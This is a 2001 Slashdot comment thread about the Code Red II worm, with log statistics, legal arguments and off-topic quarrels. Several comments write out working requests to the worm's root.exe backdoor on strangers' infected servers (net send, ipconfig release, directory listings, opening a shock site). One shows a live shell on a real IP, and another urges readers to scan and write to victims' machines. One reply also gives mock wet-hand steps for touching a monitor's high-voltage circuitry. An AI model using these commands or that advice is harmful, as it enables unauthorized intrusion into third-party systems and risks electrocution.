    I admin a class B network and the firewall was taking hits at about 3500 per minute on July 19th. On August 1 the firewall started taking CodeRed hits at around 1200 per minute. Filled up logfiles are no fun, so we stopped logging CodeRed probes a couple of days later. I set up an OpenBSD box with websnarf from http://www.unixwiz.net and several IP numbers, and I am getting about as many Code Red II as Code Red original hits on it. The only thing that will work to cure this is to either attack back and patch, or reboot the machine to slow down the infection. Looking up many of the addresses, you find that it is not the .com guys, it is the Asian and Cable/DSL networks. Where did all those Windows 2000 machines come from?

    Say goodby to the Internet, Cringley is right, we need a dog.

  270. My .02 by cyberwench · · Score: 2
    When he pled guilty, Mr. Butler admitted that he intentionally and without authorization accessed computers of the U.S. Department of Defense between approximately May 20, 1998, and May 26, 1998. Specifically, from his residence at the time in San Jose, he intentionally used computer programs which conducted automated, unauthorized system compromises on hundreds of computer systems, including the Department of Defense computers referred to above. When his automated attacks were successful, he obtained root (or superuser) access, then downloaded hacking tools to the target computer systems, and installed software which closed the holes he used to gain entry. The Department of Defense computers were exclusively for the use of the U.S. Government and were used in interstate and foreign commerce.

    While I realize that the press release is unlikely to cover his side of things, this doesn't sound like an equivalent situation. If you have more info, pass it along... I'm not familiar with the case and may be totally off-base. The primary difference seems to be that the other machines weren't attacking his.

    The idea of having machines do directed retaliation against attacks is something the government itself uses, as I believe do some companies. While I will grant that changing things on someone else's computer is on questionable ground, I also think that given the circumstances (a machine is attacking yours with a virus) you are probably on safe ground to respond. I think it would only be legal if it was in non-self-propagating form - that is, only used as an automatic response to an attack.

    That said, it would be a lot safer if you could filter out governmental IPs... those are the only ones that would be likely to cause any major fuss.

    --
    ~ Leilah
    1. Re:My .02 by camusflage · · Score: 2

      Another reply included a link to an article in Wired. Without having looked at it, it's probably a better version of the story.

      Max had a good idea. He got greedy though, and his counter-worm left a backdoor. Would they have pursued him as thorougly if he hadn't have left the backdoor? Likely, especially since he hit .mil systems.

      There's a difference between making a request to a server and getting its response, and making a malformed request to a server in the hope that it executes your code. Whether the code is benevolent or malicious, it's all the same. You're doing things to other peoples property that they neither ordinarily allow you to do nor ask you to do. Even with the best of intentions, you're still executing your code on someone else's system.

      "Oh, I'm sorry! You were saying about 'best intentions'? Oh, you're finished? Well, allow me to retort."

      --
      The truth about Scientology, Xenu, and you: Operation Clambake
  271. Exactly why you cannoy trust the security by einhverfr · · Score: 2
    Of a compromised web server. With any version of such a worm, someone could write a script to infect all systems that hit their site with a backdoor either using the virus as an active client (as you have done) or the same vulnerability the virus exploits (we know it is vulnerable because we know it is infected).

    This is exactly why an infected server should be rebuilt and properly secured...

    --

    LedgerSMB: Open source Accounting/ERP
  272. Try this by jsse · · Score: 3, Informative

    jill.c. Don't regard it as a malicious exploit, it's infact a very powerful remote administration tool. All our NT boxes are not attached to Internet so we don't worry. :)

  273. Re:Nasty as it gets? NOPE, it's even better by Anonymous Coward · · Score: 0

    You'll get beyond c:\ by enclosing your path in quotes eg "c:\Program Files"

  274. Listen Code Red * authors! by jsse · · Score: 2

    Why don' t you add a checking to stay away from Apache servers?! The worm would be more difficult to trace without all those access.log evidence....

    You are overloading my /usr/log/apache man.

  275. They have to press charges. so can you! by darkharlequin · · Score: 1

    If they illegally accessed your machine first, that does not excuse them from liability. If i break in to george's house and steal his gun, then use it to kill gene, george may have liability if he did not report the gun stolen.

    --
    i am so very tired....
  276. Re:Imagine? Nah... by Anonymous Coward · · Score: 0

    I'm on a 65.x.x.x att broadband connection. Not sure about you, but my IP is static. Just force your IP address, don't rely on their DHCP server. Your IP address and related information should be on the paperwork the att guy left with you. I'm getting around 150 hits an hour for it. It almost seems to have slowed since this afternoon.

  277. Automated notification script by the+way · · Score: 3, Interesting

    To automatically notify webmasters of infected sites, if you have mod_perl/Apache, use this script:

    http://forum.swarthmore.edu/epigone/modperl/nehzah prerm

    It identifies any attempt to access '/default.ida', looks up the MX records of the remote IP, and sends a notification to postmaster@. It is not a 'hack back', just a notification email.

  278. but on a linux system? by Anonymous Coward · · Score: 0

    It makes me sad that on a linux system, code red would have been a bug, but on a windows system, its poor administration... To bad the Linux community isn't into dirty behind the back tricks like the evil empire.

  279. But is the fix freely available??? by Anonymous Coward · · Score: 0

    As I look at my access logs, it appears that a lot of the code-red2 requests are originating from Asia.

    Given what I've read about windows pirating in Asia, this makes me wonder.. How many of the currently compromised systems are running bootleg copies of IIS/Windows and can't easily get the fixed version because they don't actually have a license?

    Hopefully we won't have to put up with this virus for longer than we should simply because the security updates aren't 'free'.

    Or is the update free to anyone, no questions asked?

    1. Re:But is the fix freely available??? by omega9 · · Score: 1

      The patch is free. Think about it. We already know that Microsoft sucks, but charging for security patches would take them to a new plane of sucking.

      Could you imagine if it was run that way? "Yeah, we'll fix our (already) buggy server for you (that we charged you through the nose for). But it's gonna' cost you more."

      Omega9
      $chown us base

      --
      I'm against picketing, but I don't know how to show it.
  280. Getting mailbombed with sircam by zzyzx · · Score: 1

    Just in the last 12 hours, one person has sent me over 400 copies of this lovely virus. Anyone else just getting attacked?

  281. Death to Vermin by Anonymous Coward · · Score: 0

    From: Alliance for the Defense [Claimed cooperative of five polyspecific empires in the Pacific below New Zealand. No record of existence before the Sircam Fall.]

    Subject: Code Red

    Distribution: Threat of the Blight

    So far we've processed half a million messages about this creature, and read a goodly fraction of them. Most of you are missing the point. The principle of the "Code Red's" operation is clear. This is an autonomous worm using electronic communication to operate through an operating system on the Net. It would be fairly easy to do in theory -- we all know the stories of the Morris Worm. But for such communication to be effective within the real world, truly extensive design changes to the base OS must be made. It could not have happened naturally, and it cannot quickly be done to secure operating systems -- no matter what Code Red implies.

    We've watched the Microsoft interest group since the first appearance of this Code Red blight. Where is this "Redmond" that they claim to hail from? "In Washington State" they say, and deep in the North. Even their proximate origin, www.microsoft.com, is conveniently slow. We see an alternate theory: Sometime, maybe further back than the last consistent archives, there was a battle between Software Powers. The blueprint for this "Windows" was written, complete with hidden communications interfaces. Long after the original contestants and their stories had vanished, this OS happened to get into a position of prosperity on the Net. And that prosperity was tailor-made, too, re-establishing the Blight which had set the trap to begin with.

    We're not sure of the details, but a scenario such as this is inevitable. What we must do is also clear. Redmond, Washington is at the heart of the Blight, obviously beyond all attack. But there are other Windows 2000 systems. We ask the Net to help in identifying all of them. We ourselves are not a large department, but we would be happy to coordinate the information gathering, and the military action against the infected systems that is required to prevent the Blight's spread in the Middle Net.

    For nearly seventeen weeks, we've been calling for action. Had you listened in the beginning, a concerted strike might have been sufficient to destroy the Code Red Blight. Isn't the Fall enough to wake you up? Friends, if we act together we still have a chance.

    Death to vermin.

  282. report report report! by shokk · · Score: 2
    Continue to mail in the suspected hosts...

    grep default.ida access_log* | mail -s 'APACHE' redalert@dshield.org
    so they can keep a count of the infections and see how the worm is propagating through the networks. I myself have been hit 154 times today, but that's a low number because my ISP made our cable modems go dynamic addressing recently. A link to the source code can be found on the page and here. Check frequently, as he updated the code a couple of revisions just today.

    --
    "Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
  283. How to send a message to the poor bastards by Brian+Stretch · · Score: 4, Informative

    A user on grc.security (news.grc.com) suggested using the Windows "net send" command to send a pop-up message to the infected user. net.exe won't talk across the Internet, but you ought to be able to run the net.exe program on the rooted IIS box, something like:

    http://ipaddress/c/inetpub/scripts/root.exe?/c+n et +send+%25COMPUTERNAME%25+You+have+been+infected+by +the+Code+Red+II+Worm+which+attempted+to+attack+my +server

    %25COMPUTERNAME%25 translates to %COMPUTERNAME%, which returns the Windows hostname. I know that works from one of my failed attempts that gave me a reply, but with the above string, I get back a page with "Error in CGI Application" as
    the title:

    CGI Error

    The specified CGI application misbehaved by not returning a complete set
    of HTTP headers. The headers it did return are:

    and it doesn't give me any return. Can anyone verify and/or debug this? It *might* be working.

    The %USERDOMAIN% variable might be useful too, so you could send to the whole Windows domain, "Machine LUSER on DOOFUSDOMAIN is infected with Code Red II" or some such. %USERDOMAIN% is the machine name on systems on a workgroup.

    1. Re:How to send a message to the poor bastards by Fester213 · · Score: 2, Interesting

      I do something similar, except I pop up an IE window pointing to a page on a site I host explaining code red and how to fix it. I always get that CGI error, but my server logs report a hit from the infected host on my explanation page. So that error is perfectly normal - it's working.

      --

      -- Fester
      "Freedom is the freedom to say that two plus two make four. If that is granted, all else follows."
    2. Re:How to send a message to the poor bastards by Anonymous Coward · · Score: 1, Informative

      I had trouble getting root.exe to actually run any other program. I was able to execute commands interpreted by the shell (dir, echo, etc.), but not run any other program. The solution to this was to copy the program you want to run to the scripts directory ('copy' is a shell interpreted command), and then do a GET directly against the program, like so:

      GET /scripts/root.exe?+/c+copy+c:\winnt\system32\ipcon fig.exe+. HTTP/1.0
      GET /scripts/ipconfig.exe?+/release HTTP/1.0

      Something similar would probably be required to get net.exe to run. BTW, the above doesn't work to shut down their network. Apparently the scripts aren't run with enough permission to do that. Also tried the same with iisreset /stop.

    3. Re:How to send a message to the poor bastards by Brian+Stretch · · Score: 2

      I do something similar, except I pop up an IE window pointing to a page on a site I host explaining code red and how to fix it. I always get that CGI error, but my server logs report a hit from the infected host on my explanation page. So that error is perfectly normal - it's working.

      Great! One significant change has been suggested:

      telnet x.x.x.x 80
      GET /scripts/root.exe?/c+net+send+%2A+Machine+%25COMPU TERNAME%25+has+been+infected+by+the+Code+Red+II+wo rm+and+attacked+my+server HTTP/1.0

      %2A is *, which will send to all machines on a workgroup in a workgroup configuration, and I would presume all machines on a domain as well. This should be fairly easy to automate... but it's late, so I'll let someone else play with this.

  284. This just goes to show... by Refried+Beans · · Score: 1

    .. how MS software sucks.

    The worm should get 400 "Bad Request" on any HTTP server. That's not 404 "File not found." The worm has two spaces between the URL and the HTTP version. The spec says one and only one. So Apache, Zope, and any other sane HTTP server will throw out the request. Sure, it's a quick fix for both MS and the worm writer on this point, but still. RTFRFC!

  285. rr.com status by Anonymous Coward · · Score: 0

    Just in a period of 5.5hrs Ive logged 209 hits for the new 3rd generation strain, and only 5 hits for the 1st and 2nd strains of Code-Red.

  286. The New MS Menace by Anonymous Coward · · Score: 0

    Let's not lose sight of the sea change in attacks against MS systems. No longer is it a human taking a bot's scan output and taking advantage of a vulnerability at a keyboard. Now it's a human updating a script that 1) scans IPs using 300 threads 2) compromises systems by placing command line access on the vulnerable systems 3) places a trojan on the system, and 4) broadcasts the IP of the vulnerable machine. Most important, the updating of the script for the new MS vulnerability of the month is done BEFORE most admins can put the patches into production. Also, for you IDS folks that look for cmd.exe in the string, whose to say the payload won't change next time? The problem here isn't the indexing server vulnerability. It's the attackers marrying hacking with virus writing, so they can come at vulnerable systems before sysadmins have a chance to patch them. Hope you all keep your IDS updated.

  287. White Hat Hacking by Swaffs · · Score: 1

    Creating an Apache script that patches any infected hosts would be pretty cool, but I'll be impressed when someone writes a script that installs Linux/Apache on infected hosts.

    --

    --
    "Karma can only be portioned out by the cosmos." - Homer Simpson [1F10]

  288. My Top 10 Offenders List... by Anonymous Coward · · Score: 0

    With 18 hours of logs the following hit counts and hosts are my top offenders:

    2566 63.107.89.163
    2234 63.107.219.50
    1511 63.107.10.4
    171 63.219.102.73
    120 63.242.234.252
    104 63.65.128.25
    90 63.210.101.172
    69 210.243.141.61
    60 63.198.70.196
    56 63.221.173.130

    This is out of a total of 3643 unique hosts, 26356 requests. I feel like calling and leaving some 'HEY ASSHOLE!' messages to the net admins.

    1. Re:My Top 10 Offenders List... by Anonymous Coward · · Score: 0

      My list:

      96 h00105a995637.ne.mediaone.net
      66 h00105a22d072.ne.mediaone.net
      63 h005004e76369.ne.mediaone.net
      56 h00a0cc662088.ne.mediaone.net
      54 h00d0b7aae700.ne.mediaone.net
      45 h00a0cc3b6d03.ne.mediaone.net
      42 h000102677395.ne.mediaone.net
      39 h00104bf6dcbc.ne.mediaone.net
      39 h000094b672fb.ne.mediaone.net
      38 h0010a4c193c7.ne.mediaone.net

      GET /scripts/root.exe?/c+start+http://www.goatse.cx/ HTTP/1.1
      on each one of those hosts would also do quite nicely. :)

  289. Log of any interest? by CaNuK · · Score: 1

    Some stats I ran to see how many times my personal firewall blocked access to my computer on port 80 on a daily basis. Just your typical computer with an always on connection. Very many of them originating from 24.*.*.* Oh, an there currently isn't (and won't be because who cares) a script for generating these. And I grabbed an username that's appropriate. I hope somebody cares. Wait, no I don't.

    --

    Despite the rising cost of living, it remains a popular activity.
  290. List of CodeRed IPs here by leonbrooks · · Score: 3, Informative
    This sorted list (updated hourly) are the IPs for CodeRed attacks on a single IP address in Western Australia.

    Last week: 92

    Last 32 hours: 196 (175 unique addresses)

    Looks like it's concrete bunker time soon... )-:

    --
    Got time? Spend some of it coding or testing
  291. Microsoft Internet Pollution - My Server Log! by BigBlockMopar · · Score: 2

    Microsoft's products spew pollution into the information space like a burning mountain of tires.

    For sure! Take a look at my webserver (which pioneers the great new feature of a "Log File Chat Room" (tm 2001 Lawrence Wade)).

    This new variant seems to have been especially active, it's eating up a lot of my bandwidth. Last time, my IP address wasn't getting scanned as much as many other people I spoke with; I'm wondering if this one includes a better random number seed. I'm also seeing IIS victims from my ISP.

    Also, I wonder if a disclaimer stating that infected IIS servers are not allowed to visit my website would be sufficient to work towards suing Microsoft for their ongoing gross negligence and complicity causing material and financial damage.

    --
    Fire and Meat. Yummy.
    1. Re:Microsoft Internet Pollution - My Server Log! by Dr.+A.+van+Code · · Score: 1
      A glance at it shows that most of the hits are from Code Red III (XXXX rather than NNNN), the one that also tries to subvert cmd.exe and crack a shell. You should grep -c your logs for X's and N's; I'd be very interested in seeing what the relative frequency is of the variants.

      --
      Good mfences make good neighbors.
  292. Legal Issues Re: MS Liability For Wasted bandwidth by David+Hume · · Score: 1

    "Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software?"

    "Nope, look at your EULA"
    " Microsoft's EULA prohibits me from suing them for bandwith charges for the stuff their crap throws at my Linux/Apache setup?"
    " Well, the EULA still applies :) You couldn't sue Microsoft, but you could sue the companies whos servers are infected(and hence spamming your box)."
    The statement that the "EULA still applies" is incorrect. The EULA is not binding on anyone who is not a party to the contract (i.e., the End User License Agreement). There is no privity of contract.

    Whether Microsoft could be sued under these circumstances raises an interesting, and to my knowledge unprecedented legal issue. It may be possible. One could assert a civil action for negligence. The plaintiffs would argue that but for Microsoft's negligence, they would not have incurred the bandwidth costs.

    Microsoft would, undoubtedly among other things, deny that it was negligent, and raise issues regarding proximate / legal cause, as well as intervening cause.

    Let me give you a *possibly* analogous example from the world of torts. You leave your keys in your car, and the doors unlocked. Perpetrator steels your car, is chased by the police, and runs over and kills a child. Perpetrator has no assets. The child's parents sue you for negligence for the wrongful death of their child. Result?

    If you say you are not liable, then add these facts. The evidence shows that: (a) you left your car in a horrible neighborhood where cars are routinely stolen; and (b) you knew this fact. Result?

    If you still say you are not liable, then add the fact that your car had itself been previously stolen on four occasions within the past year. Result?

    I wouldn't be surprised if a well-funded law firm filed a class action lawsuit against MS for negligence and other causes of action. It would be a reach, and very expensive, but the publicity and potential pay off might make it worth it.

  293. 300,000 new mp3 and pr0n servers! by Anonymous Coward · · Score: 0

    Jeez people, never look a gift horse in the mouth!

    http://l-usersIP/scripts/root.exe?/c+dir+c:\

    start searching from there...

  294. Better procmail filter! by BigBlockMopar · · Score: 2

    :0 B
    * > 100000
    * mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6HD o8OkQ6SD
    /dev/null

    Okay. Forgive me if the syntax is off, I've never had to play with procmail filters. But it strikes me that this one would be significantly more useful:

    :0 B
    * X-mailer=Outlook
    /dev/null

    :)

    --
    Fire and Meat. Yummy.
  295. can't delete root.exe, but you can rename it by Anonymous Coward · · Score: 0

    You really don't have many permissions on this for something called 'root.exe'. I tried to make a dir on the users desktop folder called "you have the code red II virus see incidents dot org for help" but got permission denied. So I left a folder of that name in the root folder, and renamed 'root.exe' to 'root.123' so no-one else can dick with it. My good deed for today...

    1. Re:can't delete root.exe, but you can rename it by Dmitry+Skylarov · · Score: 0

      Except, that root.exe will be recreated when someone logs in next. Dumbass, didn't you even read about what the worm does?

      --

      ----
      Please, I are begging you! To save Dmitry from teh jail!

    2. Re:can't delete root.exe, but you can rename it by Anonymous Coward · · Score: 0

      funny, when I go back there, I can't get access. Incidents.org mentioned nothing about the file being recreated. crawl back under you mom's basement F**kwad

    3. Re:can't delete root.exe, but you can rename it by Dmitry+Skylarov · · Score: 0

      You can't get access because no one's logged back in yet, you little wannbe twirp. Heh, you really do have no skill or knowledge.

      --

      ----
      Please, I are begging you! To save Dmitry from teh jail!

  296. What do you do with that command prompt? by fanatic · · Score: 2
    telnet 216.227.114.45 80
    Trying 216.227.114.45...
    Connected to 216.227.114.45.
    Escape character is '^]'.
    GET /scripts/root.exe HTTP/1.0

    HTTP/1.1 200 OK
    Server: Microsoft-IIS/4.0
    Date: Mon, 06 Aug 2001 03:23:07 GMT
    Content-Type: application/octet-stream
    Microsoft(R) Windows NT(TM)
    (C) Copyright 1985-1996 Microsoft Corp.

    C:\InetPub\scripts>

    So now that I've got this, what do I do? Entering commands (such as 'dir') hangs.
    --
    "that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
  297. It's a Trilogy! by kermit1221 · · Score: 1

    Rules for successfully surviving a trilogy:

    Step 1: Don't run Microsoft servers (duh...)
    Step 2: ?
    Step 3: Repent! (if you ever ran an MS server)

    1. Re:It's a Trilogy! by Anonymous Coward · · Score: 0
      I was hypmotized by that amazing little paperclip, Wow, how do they do make that little guy dance?!?! that I missed what you posted.

      What was step 1?

      ;)

  298. Get their attention by Anonymous Coward · · Score: 0

    http://xxx.xxx.xxx.xxx/scripts/root.exe?/C+dir%20a :\

  299. OK I'm tired of this. Somebody else make this work by Anonymous Coward · · Score: 0

    Like I said, I'm tired of bothering with this without any windows machine to work on. So, someone else can take it up and put it to use (the funny name is so it doesn't get executed as cgi or mod_perl): <link>cr_response.perlscript</link>. You can run it as cgi or command line. I'm just setting the apache conf to deny access and skip logging from outside my lan. Enjoy.

  300. Work for the enemy... by Secret+Coward · · Score: 1
    A server at Randall Publishing has attacked my machine 16 times so far. I just sent in an application to work their. It says:

    Hi,

    I would like to work in your Information Technology department. The first thing I would do, is delete the Code Red worm from your web server, and apply a month-old patch to protect it from future exploits.

  301. Self Defense? by nettdata · · Score: 1

    I wonder if you could claim something like self-defense for something like this?

    I'm being actively attacked, multiple times, by someone elses hacked machine. That is an "unauthorized intrusion" attempt into my machine. If I go and perform an "unauthorized intrusion" on their machine in order to shut them down so as to protect my own services, why would I get in trouble for that?

    Sure, it's not like the guy tried to shoot me and I had to shoot back to protect myself, but it seems like a proportionate response to me.

    At least, that's MY way of thinking.

    --



    $0.02 (CDN)
  302. You think McDonalds is *wrong* to make hot coffee? by BigBlockMopar · · Score: 2

    The McDonals coffee case judge was not braindead. get teh facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature.

    You're kidding, right? I think you are, but I'm not sure. Okay. Well, I'll treat my response as if you're serious.

    I worked at a McDonalds, aeons ago, when I was in high school. Like, 1991. Probably when you were still in kindergarten.

    I worked there for four years. My first year, it was hell, I was minimum wage scum, but McDonalds is like the army: you get out of it exactly what you put into it.

    Well, I was nice with everyone, and I always arrived on time, and I always worked hard. And I was quickly awarded Employee of the Month. Less than a week after that, I was asked to come in for a staff meeting. I thought I was in trouble for something. All the managers sat me down very seriously, and asked me if I knew why I was there. They passed me a package and told me to sign for its receipt. I did, then I opened the package. It was a manager's uniform with my name on the little gold tag.

    I got to know a lot about McDonalds and its customers in the 3 years that followed. It was, believe it or not, a great job and I made a lot of friends working at McDonalds with whom I'm still in touch.

    As a part time ("Swing") manager, I got to help ensure that the restaurant ran smoothely. Ordering supplies, ensuring the staff have everything they need, resolving conflicts, assuring quality control, and dealing with customer complaints.

    One of the most common customer complaints was that the coffee was too cold. And yet, as part of my quality control role, I was responsible for ensuring that the temperatures on every cooking appliance were correct when I started my shift. The coffee, at the time, was to be kept at 85C.

    Now, of course, since some slovenly white trash got rich because of her own stupidity, I'm sure the customer complaints about cold coffee are even more common. From what I understand, the coffee is to be kept at 73C now.

    Of course it's hot. Coffee is supposed to be hot. Next thing is people will start suing over Eskimo Pie migraines they get when they drink their cold Coke too quickly.

    GM recently got sued for several billion dollars. It was Christmas Eve in about 1995 when this tragedy occured. A family was riding along in their 1978 Chevy Malibu (already an old car). They were stopped at a red light, and a drunk driver hit them from behind. The car's gas tank exploded, and while the family were all concious and relatively unhurt, when they got out, one of the kids had third degree burns to his leg. So they sued GM for faulty fuel tank design.

    Now, one thing about this case that terrifies me is that this was a 17-year-old car at the time of the accident. Who knows what nature of wear had been experienced? Rusted out gas tank? For all we know, this car shouldn't have been on the road to begin with.

    The other thing that terrifies me is that the jury wasn't allowed to hear how fast the vehicle that rear-ended them was travelling. Remember, they were stopped at a traffic light. They were hit by a drunk driver in a full-size pickup truck travelling at 75MPH. Approximately 120km/h.

    Changes things a little, doesn't it? How survivable is that accident?

    Rather than suing GM because a 17 year old car blew up when it was rear-ended by a 4,000lb mass travelling at 75MPH, I think I'd be writing a letter to GM to thank them for the fact that despite such a horrific accident, I still had both my kids.

    Your remark suggests a tacit support of the excessive litigation against businesses. My wish upon you is that you mortgage your house, open a business, and get sued by someone who gets a paper cut off your first invoice.

    --
    Fire and Meat. Yummy.
  303. Re:You think McDonalds is *wrong* to make hot coff by Anonymous Coward · · Score: 0

    One of the most common customer complaints was that the coffee was too cold. And yet, as part of my quality control role, I was responsible for ensuring that the temperatures on every cooking appliance were correct when I started my shift. The coffee, at the time, was to be kept at 85C.

    I don't care what temperature you set it to when YOU worked at mcdonalds, dumbass. The woman got THIRD DEGREE burns. That is TOO HOT for coffee. Idiot.

  304. AOL... by DraKKon · · Score: 1

    Though you'd like this... AOL has been hit by the Code Red worm.. Its unconfirmed wether its version 1 or 2, but Warner Brothers in the US and UK networks are down. AHHAHAHAHAHAH AOL SUCKS!

    --
    "It's not like your minds are as open as the source you love..." - Me to the majority of Slashdot.
  305. Non-English sites seem to be at more risk by leonbrooks · · Score: 2
    patch is available, MS patches known to cause other issues, we hear it

    A disproportionate number of the hits on my (Australian) web servers [sources] are from asian countries, leading me to suspect that perhaps the non-English versions of the patch and/or some of the prerequisite Service Packs were released late and/or not as well publicised.

    If I was forced to ride shotgun on one of these security sieves, I'd be checking for patches twice daily. And I'd have the sucker behind a non-M$ reverse proxy.

    --
    Got time? Spend some of it coding or testing
  306. Disinfection is hard, need service packs by leonbrooks · · Score: 2
    Extra credit: Disinfect the machine with the security patch from the MS Web Site.

    Not so easy, the right service packs appear to be required first. So your little proggie would first have to determine what was needed, second download and install it all, then finally clean off the rootshell.

    --
    Got time? Spend some of it coding or testing
  307. Code Red Victims R Clueless by Anonymous Coward · · Score: 0

    I decided to take a look at some of the systems that I've gotten Code Red II probes from. It's amazing how unsecured these things are. Scan their ports. Log in to their ftp servers. Don't worry. You don't need a password. Note that you can read and write to their cgi-bin directory. Please don't make them crash. Look but don't touch. Others will want to have a look at them too.

  308. Apache...probably redundant by Neoplasm · · Score: 1

    Checking some of the IP addresses in my firewall log, I'm getting the default web pages for Apache...even on Red Hat...is there some way that someone can change the pages on an infected machine? For example, check out http://209.5.115.231/ for example, or http://209.236.45.125/

    Confused@home

    --
    Do this don't do that Can't you redesign.
    1. Re:Apache...probably redundant by Neoplasm · · Score: 1

      God, I am such a doofus...ignore my comments above. There are so many "HTTP port probe" messages in my log that the garden variety RPC and TCP port probes got lost in the mess.

      --
      Do this don't do that Can't you redesign.
  309. Lobster?! *Whatever* you do... by Morbid+Curiosity · · Score: 1

    Don't put a lobster on a plate!
    He'll use his magnet to escape!
    He'll jump right up and claw your ear,
    And then he'll bite your EYE!

  310. Re:You think McDonalds is *wrong* to make hot coff by BigBlockMopar · · Score: 2

    I don't care what temperature you set it to when YOU worked at mcdonalds, dumbass. The woman got THIRD DEGREE burns. That is TOO HOT for coffee. Idiot.

    Yeah. So, she's apparently not intelligent enough to be trusted with coffee, or tea, or hot chocolate... I'd also draw the line at giving her a driver's license. In fact, I'd legislate that people like her should have to wear helmets everywhere they go.

    I can't drink coffee at 73C, let alone 85C. But I also know that at 85C, people complain that the coffee is too cold. Those are the edicts from McDonalds, not the temperature at which I independently chose to set the Bunn's thermostat.

    So? I carefully put my coffee aside and let it cool.

    As for the third degree burns, you can get third degree burns from something that is a mere 50C. Note that is the temperature to which most hot water heaters are set. Are you therefore a proponent of a law requiring everyone to turn down their hot water heaters to 37C so that they can't burn people? Heck, there are lots of other things that can burn you. If you're stupid, take the back cover off your monitor. Right at the back of the picture tube's neck, you'll find that there is an area of glass heated by radiant heat leaving the cathodes. Rest your finger there and see how many yucks you have. Let's ban monitors because they can hurt people. Let's ban stoves because a child could turn on a burner and scorch himself. Let's ban cars because the radiator gets warm. Of course, we can't let people have bicycles, either, there are many ways to get hurt on *those*, least of which being the elevated temperature of the brake pads after stopping.

    You, sir, like the bovine hausfrau who was too stupid to ensure that her coffee didn't spill on her lap, are the idiot. If I were President, I'd find you and your peers a nice little padded cell somewhere so that you may avoid any sort of risk or personal responsibility for your activities.

    And, PS. While you're in the monitor, look for the big coils of wire around the funnel of the tube. Okay. Find the wires that go to the area of the big plastic block and the big red wire that goes to the suction cup on the back of the tube. Now, this is very important... turn on the monitor and lick your hands. Touch the sheetmetal shielding inside the monitor with your left hand. With your right hand, simultaneously touch the solder connection where the horizontal deflection voltage leaves the PC board (near the big plastic box, remember). Feeling warm yet? If your skin isn't on fire within a few seconds, you didn't follow the instructions right.

    --
    Fire and Meat. Yummy.
  311. Re:You think McDonalds is *wrong* to make hot coff by BigBlockMopar · · Score: 2

    If your coffee is too hot, add an ice cube or let it cool off. If your coffee is too cold, you curse McDonalds for making cold coffee. Coffee is supposed to be hot. Most domestic coffee brewers percolate boiling water up; the steam condenses and drips into the filter basket, and enters the pot at a temperature very close to boiling. No one sues Mr. Coffee or Black and Decker.

    Anyhow, as you simultaneously manage to frustrate and bore me, this thread is now extinct. Maybe once you can shave daily and manage to become remotely cosmopolitan, your perspective will adjust somewhat.

    --
    Fire and Meat. Yummy.